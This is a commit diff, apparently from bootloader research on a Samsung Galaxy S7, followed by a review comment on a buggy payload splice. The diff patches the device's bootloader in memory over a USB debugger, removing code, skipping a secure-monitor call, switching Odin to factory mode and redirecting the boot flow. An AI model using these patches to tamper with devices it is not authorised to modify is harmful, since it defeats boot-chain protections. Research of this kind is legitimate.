Modify usb_recovery boot to boot normally or in another way

This commit is contained in:
Jonathan Herrewijnen 2024-10-24 18:28:39 +02:00
parent d187b06980
commit 3b89bec190
2 changed files with 6 additions and 65 deletions


@ -798,76 +798,17 @@ class ExynosDevice():
# Sends stage 5 (BL33) but returns to debugger after sending.
stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read()
off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9"))
stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):]
# print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read()
# off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9"))
# stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):]
self.send_normal_stage(stage4)
self.connect_device()
self.usb_read(0x200) # GiAs
# # Modify something in BL33
print(self.cd.arch_dbg.state.print_ctx())
print(self.cd.memdump_region(0x8f063710, 0x8))
self.cd.memwrite_region(0x8f063710, struct.pack('>I', 0x53614d74))
print(self.cd.memdump_region(0x8f063710, 0x8))
# Modify USB Recovyer mode string to: NFI Patched BL33
# patch_string = b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33'
# self.cd.memwrite_region(0x8f06ab10, patch_string)
# Print state of x30/LR on screen
self.cd.memwrite_region(0x8f063718, struct.pack('>I', 0x61616161))
### ==================== Writing nops to code cave
# Write NOP from 0x8f008cb8 to 0x8f008d14 using self.cd.memwrite
for i in range(0x8f008cb8, 0x8f008d14, 4):
self.cd.memwrite_region(i, b'\x1f\x20\x03\xd5')
#self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5))
# Overwrite the data pointer showing 'USB Recovery Mode' to something else
# self.cd.memwrite_region(0x8f01dc00, struct.pack('>I', 0x24080090))
# Overwrite a str to a something else
# self.cd.memwrite_region(0x8f01dc28, struct.pack('>I', 0xe40300f9))
# Nop initial show usb recovery mode screen function
# self.cd.memwrite_region(0x8f022654, struct.pack('>I', 0x1f2003d5))
self.cd.memwrite_region(0x8f022654, struct.pack('>I', 0xe4ff9fd2))
# Modify a mov function (0xffff into x4). If this is not nopped, or adjusted, the device will crash. But will try to continue booting (?)
self.cd.memwrite_region(0x8f022658, struct.pack('>I', 0x1f2003d5)) #0xe5031daa.
# Overwrite log function to display screen at end of nops
self.cd.memwrite_region(0x8f02265c, struct.pack('>I', 0xbbffff97)) #0xbbffff97
# ==================
# for i in range(0x8f008cd8, 0x8f008cf4, 4):
# self.cd.memwrite_region(i, struct.pack('>I', 0x1f2003d5))
# # Write shellcode to set some contents on x0 to x5 registers
# shellcode = f"""
# // x5 is the address at x0
# mov x5, x0
# mov x0, 0x1234
# mov x1, 0x12
# mov x2, 0xffff
# mov x3, 0xffff
# mov x4, 0xffff
# bl 0x8f025fb8
# // ret
# """
# shellcode = ks.asm(shellcode, as_bytes=True)[0]
# self.cd.memwrite_region(0x8f008cd8, shellcode)
# Nop a adrp towards 0x8f09a000
self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5))
# ODIN MODE to FACTORY mode
self.cd.memwrite_region(0x8f0114f8, struct.pack('>I', 0x82008052))
# Nop a SMC call in BL2
self.cd.memwrite_region(0x02059650, struct.pack('>I', 0x1f2003d5))
# Change bootmode to SDCARD (allow normal booting, if pressing volume up)
self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))
# Jump into a different function that continues the boot flow (different than BL33_LR)
self.cd.restore_stack_and_jump(0x02024e5c)
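Review bot: The splice that inserts print_payload into stage4 looks wrong: `stage4[off:] + print_payload + stage4[off+len(print_payload):]` keeps the whole tail from `off` in front of the payload and repeats part of it afterwards, so the image grows and the bytes at `off` are never replaced; if the intent is to overwrite at `off`, the head slice should be `stage4[:off]`. `off` is also used unchecked, and `bytes.find` returns -1 on a miss, which would silently splice at the last byte; I would add `if off < 0: raise ValueError("anchor sequence not found in stage4")` before the splice and write `stage4 = stage4[:off] + print_payload + stage4[off + len(print_payload):]`. The two `open(...).read()` calls above it never close their file objects; `with open(path, "rb") as f:` avoids the leak, and the absolute `/home/jonathan/...` path ties the script to one machine, so a module-level constant or parameter would be clearer. Which of these lines are new versus context is not certain from the rendered hunk, and the enclosing method starts before the hunk (its `def` line is outside it).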

Binary file not shown.